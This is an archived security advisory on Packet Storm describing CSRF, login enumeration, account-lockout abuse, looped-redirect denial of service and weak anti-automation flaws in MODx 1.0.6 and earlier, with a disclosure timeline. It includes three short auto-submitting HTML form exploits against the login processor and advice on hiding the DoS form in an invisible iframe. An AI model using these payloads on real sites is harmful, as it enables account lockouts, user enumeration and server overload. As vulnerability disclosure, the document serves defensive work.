exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MODx 1.0.6 XSS / Abuse Functionality / Denial Of Service

MODx 1.0.6 XSS / Abuse Functionality / Denial Of Service
Posted Nov 29, 2012
Authored by MustLive

MODx versions 1.0.6 and below suffer from cross site request forgery, abuse of functionality, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, csrf
SHA-256 | 06e2431993e324f2e749b37a6e7c7e00a479836f6dfc847e0cea7aa9db329961

MODx 1.0.6 XSS / Abuse Functionality / Denial Of Service

Change Mirror Download
Hello list!

I want to warn you about new security vulnerabilities in MODx. This is the
second part of the vulnerabilities in this CMS (6 vulnerabilities to
previous 19 vulnerabilities).

These are Cross-Site Request Forgery, Abuse of Functionality, Denial of
Service and Insufficient Anti-automation vulnerabilities in MODx. It's about
0.x and 1.x (Evolution) versions of MODx CMS. In 2.x (Revolution) versions
of MODx there are part of these holes and part of new holes - I've wrote
separate advisory concerning it.

-------------------------
Affected products:
-------------------------

Vulnerable are MODx 1.0.6 and previous versions.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

Lack of captcha in login form (http://site/manager/) can be used for
different attacks - for CSRF-attack to login into account (remote login - to
conduct attacks on vulnerabilities inside of account), for automated
entering into account, for phishing and other automated attacks. Which you
can read about in the article "Attacks on unprotected login forms"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).
Bellow mentioned DoS attack is conducting via this CSRF vulnerability.

Abuse of Functionality (Login Enumeration) (WASC-42):

In login form (http://site/manager/) Login Enumeration is possible. If
blocking isn't triggering after three requests (as can be set at the site),
then there is no such login in the system, i.e. the blocking works only for
working logins. The attack is possible, when blocking is turned on.

So by sending three (by default) POST requests per verifiable login, it'll
possible to pick up working logins. To use for attacks on earlier mentioned
Brute Force vulnerability.

Exploit:

<body onLoad="document.hack.submit()">
<form name="hack"
action="http://site/manager/processors/login.processor.php" method="post">
<input type="hidden" name="ajax" value="1">
<input type="hidden" name="username" value="test">
<input type="hidden" name="password" value="test">
</form>
</body>

Abuse of Functionality (WASC-42):

After finding of login with above-mentioned vulnerability it's possible to
abuse blocking of accounts. After three unsuccessful attempts (as can be set
at the site) the account is blocking (including account of the
administrator). By persistent sending of requests to this functionality (by
three incorrect requests), it's possible to persistently put the account in
blocked state (including account of the administrator).

Exploit:

<body onLoad="document.hack.submit()">
<form name="hack"
action="http://site/manager/processors/login.processor.php" method="post">
<input type="hidden" name="ajax" value="1">
<input type="hidden" name="username" value="admin">
</form>
</body>

Denial of Service (WASC-10):

At sending of POST request to script
http://site/manager/processors/login.processor.php, he returns to previous
page, which again sends to this script. By this way it creates Looped DoS,
which can overload the server.

About Looped DoS vulnerabilities I've wrote in 2008's articles Looped DoS
and Classification of DoS vulnerabilities in web applications
(http://websecurity.com.ua/2663/) and in 2009's article Redirectors: the
phantom menace
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2009-September/005722.html).
According to my articles, for conducting of such DoS attack it's needed to
give users a link to such looped redirect, which will be infinitely sending
requests and overloading a server (in case of MODx it's possible to create
unidirectional and bidirectional Looped DoS). In case of POST request it can
be html form placed on popular site, e.g. in hidden iframe to conduct attack
invisibly and as long as the page with iframe will be opened by users.

Exploit:

<body onLoad="document.hack.submit()">
<form name="hack"
action="http://site/manager/processors/login.processor.php" method="post">
</form>
</body>

Insufficient Anti-automation (WASC-21):

In login form (http://site/manager/) there is no protection against
automated request, which allows to picking up logins (via Abuse of
Functionality vulnerability) in automated way. As to pick up passwords (via
Brute Force vulnerability) for picked up logins in automated way. And also
to conduct automated blocking of revealed accounts.

In password recovery form (http://site/manager/index.php?action=show_form)
there is no protection against automated request, which allows to picking up
e-mails of users in automated way.

------------
Timeline:
------------

2012.06.28 - announced at my site.
2012.06.28 - informed developers about the first part of vulnerabilities.
2012.06.30 - informed developers about the second part of vulnerabilities.
2012.07.28 - informed developers about vulnerabilities in MODx Revolution
and reminded about previous two letters.
2012.07.28-2012.10.31 - during conversation with developers about MODx
Revolution, I was constantly reminding them, that I've sent them info about
holes in Evolution and I can resent them, because it was clear that they
missed it (they only were answering concerning Revolution).
2012.11.02 - after developers said they want to see this information (missed
by them in June), I've resent the first two letters to the developers.
2012.11.24 - disclosed at my site (http://websecurity.com.ua/5929/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close